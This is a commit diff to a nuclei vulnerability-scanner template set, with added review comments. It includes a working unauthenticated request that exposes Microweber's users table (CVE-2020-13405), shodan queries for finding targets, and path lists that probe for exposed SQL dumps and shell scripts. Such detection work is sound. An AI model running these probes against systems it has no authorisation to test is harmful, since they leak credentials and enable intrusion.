up goby_pocs and nuclei_templates 2022-07-29
x51pwn committed Jul 29, 2022
1 parent 48a9a74 commit a945065
Showing 96 changed files with 2,283 additions and 1,949 deletions.
24 changes: 12 additions & 12 deletions config/nuclei-templates/README.md
Expand Up @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,

| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1294 | daffainfo | 605 | cves | 1277 | info | 1352 | http | 3554 |
| panel | 591 | dhiyaneshdk | 503 | exposed-panels | 600 | high | 938 | file | 76 |
| lfi | 486 | pikpikcu | 321 | vulnerabilities | 493 | medium | 766 | network | 50 |
| xss | 439 | pdteam | 269 | technologies | 266 | critical | 436 | dns | 17 |
| wordpress | 401 | geeknik | 187 | exposures | 254 | low | 211 | | |
| exposure | 355 | dwisiswant0 | 169 | misconfiguration | 207 | unknown | 7 | | |
| cve2021 | 322 | 0x_akoko | 154 | token-spray | 206 | | | | |
| rce | 313 | princechaddha | 147 | workflows | 187 | | | | |
| wp-plugin | 297 | pussycat0x | 128 | default-logins | 101 | | | | |
| tech | 282 | gy741 | 126 | file | 76 | | | | |

**281 directories, 3922 files**.
| cve | 1308 | daffainfo | 614 | cves | 1291 | info | 1368 | http | 3593 |
| panel | 595 | dhiyaneshdk | 504 | exposed-panels | 604 | high | 943 | file | 76 |
| lfi | 487 | pikpikcu | 322 | vulnerabilities | 500 | medium | 778 | network | 50 |
| xss | 445 | pdteam | 269 | technologies | 267 | critical | 442 | dns | 17 |
| wordpress | 406 | geeknik | 187 | exposures | 255 | low | 211 | | |
| exposure | 360 | dwisiswant0 | 169 | token-spray | 215 | unknown | 7 | | |
| cve2021 | 322 | 0x_akoko | 155 | misconfiguration | 210 | | | | |
| rce | 317 | princechaddha | 147 | workflows | 187 | | | | |
| wp-plugin | 301 | pussycat0x | 128 | default-logins | 101 | | | | |
| tech | 283 | gy741 | 126 | file | 76 | | | | |

**283 directories, 3961 files**.

</td>
</tr>
Expand Down
2 changes: 1 addition & 1 deletion config/nuclei-templates/TEMPLATES-STATS.json

Large diffs are not rendered by default.

3,382 changes: 1,704 additions & 1,678 deletions config/nuclei-templates/TEMPLATES-STATS.md

Large diffs are not rendered by default.

20 changes: 10 additions & 10 deletions config/nuclei-templates/TOP-10.md
@@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1294 | daffainfo | 605 | cves | 1277 | info | 1352 | http | 3554 |
| panel | 591 | dhiyaneshdk | 503 | exposed-panels | 600 | high | 938 | file | 76 |
| lfi | 486 | pikpikcu | 321 | vulnerabilities | 493 | medium | 766 | network | 50 |
| xss | 439 | pdteam | 269 | technologies | 266 | critical | 436 | dns | 17 |
| wordpress | 401 | geeknik | 187 | exposures | 254 | low | 211 | | |
| exposure | 355 | dwisiswant0 | 169 | misconfiguration | 207 | unknown | 7 | | |
| cve2021 | 322 | 0x_akoko | 154 | token-spray | 206 | | | | |
| rce | 313 | princechaddha | 147 | workflows | 187 | | | | |
| wp-plugin | 297 | pussycat0x | 128 | default-logins | 101 | | | | |
| tech | 282 | gy741 | 126 | file | 76 | | | | |
| cve | 1308 | daffainfo | 614 | cves | 1291 | info | 1368 | http | 3593 |
| panel | 595 | dhiyaneshdk | 504 | exposed-panels | 604 | high | 943 | file | 76 |
| lfi | 487 | pikpikcu | 322 | vulnerabilities | 500 | medium | 778 | network | 50 |
| xss | 445 | pdteam | 269 | technologies | 267 | critical | 442 | dns | 17 |
| wordpress | 406 | geeknik | 187 | exposures | 255 | low | 211 | | |
| exposure | 360 | dwisiswant0 | 169 | token-spray | 215 | unknown | 7 | | |
| cve2021 | 322 | 0x_akoko | 155 | misconfiguration | 210 | | | | |
| rce | 317 | princechaddha | 147 | workflows | 187 | | | | |
| wp-plugin | 301 | pussycat0x | 128 | default-logins | 101 | | | | |
| tech | 283 | gy741 | 126 | file | 76 | | | | |
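--- a/config/nuclei-templates/cves/2020/CVE-2020-13405.yaml
+++ b/config/nuclei-templates/cves/2020/CVE-2020-13405.yaml
@@ -0,0 +1,47 @@
+id: CVE-2020-13405
+
+info:
+name: MicroWeber - Unauthenticated User Database Disclosure
+author: ritikchaddha,amit-jd
+severity: high
+description: |
+The PHP code for controller.php run Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML.
+reference:
+- https://rhinosecuritylabs.com/research/microweber-database-disclosure/
+- https://nvd.nist.gov/vuln/detail/CVE-2020-13405
+- https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+cvss-score: 7.5
+cve-id: CVE-2020-13405
+cwe-id: CWE-306
+metadata:
+shodan-query: http.html:"microweber"
+verified: "true"
+tags: cve,cve2020,microweber,unauth,disclosure
+
+requests:
+- raw:
+- |
+POST /module/ HTTP/1.1
+Host: {{Hostname}}
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Referer: {{BaseURL}}admin/view:modules/load_module:users
+module={{endpoint}}
+payloads:
+endpoint:
+- "users/controller"
+- "modules/users/controller"
+- "/modules/users/controller"
+
+matchers:
+- type: dsl
+dsl:
+- 'contains(body,"username")'
+- 'contains(body,"password")'
+- 'contains(body,"password_reset_hash")'
+- 'status_code==200'
+- 'contains(all_headers,"text/html")'
+condition: and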
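Review bot: The Referer line in the raw request is written `Referer: {{BaseURL}}admin/view:modules/load_module:users` with no `/` between `{{BaseURL}}` and `admin`, while every other path in this commit is written `{{BaseURL}}/…` (for example `{{BaseURL}}/goanywhere/auth/Login.xhtml` in goanywhere-mft-login.yaml); unless the input URL is supplied with a trailing slash the header is malformed. `Referer: {{BaseURL}}/admin/view:modules/load_module:users` would follow the repository convention. Separately, the template name spells the product `MicroWeber` whereas CVE-2022-0921.yaml in the same commit uses `Microweber`; one spelling keeps name-based search and grouping consistent. The description's "run Laravel's dump and die function" reads as "runs"; worth fixing in the same pass.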
5 changes: 4 additions & 1 deletion config/nuclei-templates/cves/2021/CVE-2021-40149.yaml
Expand Up @@ -3,15 +3,18 @@ id: CVE-2021-40149
info:
name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure
author: For3stCo1d
severity: high
severity: medium
description: |
Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.
reference:
- https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40149
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 5.9
cve-id: CVE-2021-40149
cwe-id: CWE-552
metadata:
shodan-query: http.title:"Reolink"
verified: "true"
Expand Down
4 changes: 2 additions & 2 deletions config/nuclei-templates/cves/2022/CVE-2022-0921.yaml
Expand Up @@ -2,15 +2,15 @@ id: CVE-2022-0954

info:
name: Microweber - Cross-site Scripting
author: amitj
author: amit-jd
severity: medium
description: |
Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11.
reference:
- https://github.com/advisories/GHSA-8c76-mxv5-w4g8
- https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0954
- https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7
- https://nvd.nist.gov/vuln/detail/CVE-2022-0954
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
Expand Down
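Review bot: The file is named cves/2022/CVE-2022-0921.yaml but the template id in the hunk header is `id: CVE-2022-0954`, and the visible references (the GHSA advisory, huntr report and the NVD link) all resolve to CVE-2022-0954; the author correction in this hunk leaves that mismatch in place. Since everything inside the file points at 0954, renaming the file to `CVE-2022-0954.yaml` looks like the right fix, but the `cve-id` in the classification block (outside the hunk) should be checked against the same CVE before doing so. Whichever CVE is correct, a file name that disagrees with its own id is easy to misfile in the stats generated from this directory. The info block starts and ends outside the hunk.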
9 changes: 6 additions & 3 deletions config/nuclei-templates/cves/2022/CVE-2022-34046.yaml
Expand Up @@ -9,11 +9,14 @@ info:
reference:
- https://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharing
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34046
metadata:
verified: true
shodan-query: http.title:"Wi-Fi APP Login"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-34046
cwe-id: CWE-863
metadata:
shodan-query: http.title:"Wi-Fi APP Login"
verified: "true"
tags: cve,cve2022,wavlink,router,exposure

requests:
Expand Down
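Review bot: The hunk rewrites the metadata flag from the bare boolean `verified: true` to the string `verified: "true"`, and the same quoted form is used in CVE-2022-34047.yaml, CVE-2022-34049.yaml and the new CVE-2020-13405.yaml, yet goanywhere-mft-login.yaml added in this same commit keeps `verified: true`. Whichever form the template schema expects, a single convention per commit keeps the metadata comparable by tooling; if the quoted string is the intended one, goanywhere-mft-login.yaml should read `verified: "true"` as well. Moving `metadata` below `classification` is a reasonable ordering but it inflates the diff beyond the one-character change actually made. The info block continues outside the hunk.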
9 changes: 6 additions & 3 deletions config/nuclei-templates/cves/2022/CVE-2022-34047.yaml
Expand Up @@ -9,11 +9,14 @@ info:
reference:
- https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047
metadata:
verified: true
shodan-query: http.title:"Wi-Fi APP Login"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-34047
cwe-id: CWE-668
metadata:
shodan-query: http.title:"Wi-Fi APP Login"
verified: "true"
tags: cve,cve2022,wavlink,router,exposure

requests:
Expand Down
7 changes: 6 additions & 1 deletion config/nuclei-templates/cves/2022/CVE-2022-34049.yaml
Expand Up @@ -3,14 +3,19 @@ id: CVE-2022-34049
info:
name: Wavlink Exportlogs.sh - Configuration Exposure
author: For3stCo1d
severity: high
severity: medium
description: |
An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows unauthenticated attackers to download log files and configuration data.
reference:
- https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34049
- https://drive.google.com/file/d/1ZeSwqu04OghLQXeG7emU-w-Amgadafqx/view?usp=sharing
- https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view?usp=sharing
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-34049
cwe-id: CWE-552
metadata:
shodan-query: http.title:"Wi-Fi APP Login"
verified: "true"
Expand Down
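--- a/config/nuclei-templates/exposed-panels/goanywhere-mft-login.yaml
+++ b/config/nuclei-templates/exposed-panels/goanywhere-mft-login.yaml
@@ -0,0 +1,27 @@
+id: goanywhere-mft-login
+
+info:
+name: GoAnywhere Managed File Transfer Login Panel
+author: ritikchaddha
+severity: info
+metadata:
+verified: true
+shodan-query: http.html:"GoAnywhere Managed File Transfer"
+tags: panel,goanywhere,login,filetransfer
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/goanywhere/auth/Login.xhtml"
+
+redirects: true
+max-redirects: 2
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "GoAnywhere Managed File Transfer"
+
+- type: status
+status:
+- 200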
3 changes: 2 additions & 1 deletion config/nuclei-templates/exposures/backups/sql-dump.yaml
Expand Up @@ -2,7 +2,7 @@ id: default-sql-dump

info:
name: MySQL Dump Files
author: geeknik,dwisiswant0
author: geeknik,dwisiswant0,ELSFA7110
severity: medium
tags: exposure,backup,mysql

Expand All @@ -28,6 +28,7 @@ requests:
- "{{BaseURL}}/translate.sql"
- "{{BaseURL}}/users.sql"
- "{{BaseURL}}/wp-content/uploads/dump.sql"
- "{{BaseURL}}/wp-content/mysql.sql"
headers:
Range: "bytes=0-3000"

Expand Down
8 changes: 7 additions & 1 deletion config/nuclei-templates/exposures/files/shellscripts.yaml
Expand Up @@ -26,6 +26,12 @@ requests:
- "{{BaseURL}}/wp-setup.sh"
- "{{BaseURL}}/deploy.sh"
- "{{BaseURL}}/aws.sh"
- "{{BaseURL}}/reminder.sh"
- "{{BaseURL}}/mysqlbackup.sh"
- "{{BaseURL}}/dev2local.sh"
- "{{BaseURL}}/local2dev.sh"
- "{{BaseURL}}/local2prod.sh"
- "{{BaseURL}}/prod2local.sh"

matchers-condition: and
matchers:
Expand All @@ -46,4 +52,4 @@ requests:
- ".*?bin.*?sh"
- ".*?bin.*?bash"
part: body
condition: or
condition: or
41 changes: 20 additions & 21 deletions config/nuclei-templates/headless/postmessage-outgoing-tracker.yaml
Expand Up @@ -19,41 +19,40 @@ headless:
args:
hook: true
code: |
(function() {window.alerts = [];
() => {
window.alerts = [];
function logger(found) {
window.alerts.push(found);
}
logger = found => window.alerts.push(found);
function getStackTrace () {
var stack;
try {
throw new Error('');
}
catch (error) {
stack = error.stack || '';
function getStackTrace() {
var stack;
try {
throw new Error('');
} catch (error) {
stack = error.stack || '';
}
stack = stack.split('\n').map(line => line.trim());
return stack.splice(stack[0] == 'Error' ? 2 : 1);
}
stack = stack.split('\n').map(function (line) { return line.trim(); });
return stack.splice(stack[0] == 'Error' ? 2 : 1);
}
var oldSender = window.postMessage;
var oldSender = window.postMessage;
window.postMessage = function(data, origin) {
if(origin == '*'){
logger({stack: getStackTrace(), args: {data, origin}});
return oldSender.apply(this, arguments);
window.postMessage = (data, origin) => {
if (origin == '*') {
logger({stack: getStackTrace(), args: {data, origin}});
return oldSender.apply(this, arguments);
}
};
})();
}
- args:
url: "{{BaseURL}}"
action: navigate
- action: waitload
- action: script
name: alerts
args:
code: "window.alerts"
code: window.alerts
matchers:
- type: word
part: alerts
Expand Down
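Review bot: The hook code is now a bare arrow expression, opening with `() => {` and closing with `}` where the old code had `(function() {` … `})();`, so the invocation has been dropped; unless the headless engine itself calls hook code as a function (nothing in the hunk suggests it does), the body never runs, `window.alerts` is never created, and the later `code: window.alerts` step evaluates to `undefined`. Inside it, `window.postMessage = (data, origin) => { … return oldSender.apply(this, arguments); }` relies on `arguments` and `this`, which arrow functions do not bind; with no enclosing non-arrow function `arguments` is a ReferenceError in page scope, and `logger = found => …` now assigns an undeclared name, creating an implicit global. The same three problems appear in headless/postmessage-tracker.yaml's hunk (the `Window.prototype.addEventListener` wrapper) and the fix is identical there. Restoring the call and using a `function` expression only for the wrapper keeps the arrow style elsewhere; note too that, pre-existing on both sides, the forwarding `return` sits inside the `if (origin == '*')` block, so messages sent to a specific origin are swallowed by the hook rather than delivered.
```javascript
(() => {
  window.alerts = [];
  const logger = (found) => window.alerts.push(found);
  // … unchanged: getStackTrace …
  const oldSender = window.postMessage;
  window.postMessage = function (data, origin) {
    if (origin === '*') {
      logger({stack: getStackTrace(), args: {data, origin}});
    }
    return oldSender.apply(this, arguments);
  };
})();
```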
45 changes: 22 additions & 23 deletions config/nuclei-templates/headless/postmessage-tracker.yaml
Expand Up @@ -19,41 +19,40 @@ headless:
args:
hook: true
code: |
(function() {window.alerts = [];
() => {
window.alerts = [];
function logger(found) {
window.alerts.push(found);
}
logger = found => window.alerts.push(found);
function getStackTrace () {
var stack;
try {
throw new Error('');
}
catch (error) {
stack = error.stack || '';
function getStackTrace() {
var stack;
try {
throw new Error('');
} catch (error) {
stack = error.stack || '';
}
stack = stack.split('\n').map(line => line.trim());
return stack.splice(stack[0] == 'Error' ? 2 : 1);
}
stack = stack.split('\n').map(function (line) { return line.trim(); });
return stack.splice(stack[0] == 'Error' ? 2 : 1);
}
var oldListener = Window.prototype.addEventListener;
var oldListener = Window.prototype.addEventListener;
Window.prototype.addEventListener = function(type, listener, useCapture) {
if(type === 'message') {
logger(getStackTrace());
}
return oldListener.apply(this, arguments);
};
})();
Window.prototype.addEventListener = (type, listener, useCapture) => {
if (type === 'message') {
logger(getStackTrace());
}
return oldListener.apply(this, arguments);
};
}
- args:
url: "{{BaseURL}}"
action: navigate
- action: waitload
- action: script
name: alerts
args:
code: "window.alerts"
code: window.alerts
matchers:
- type: word
part: alerts
Expand Down
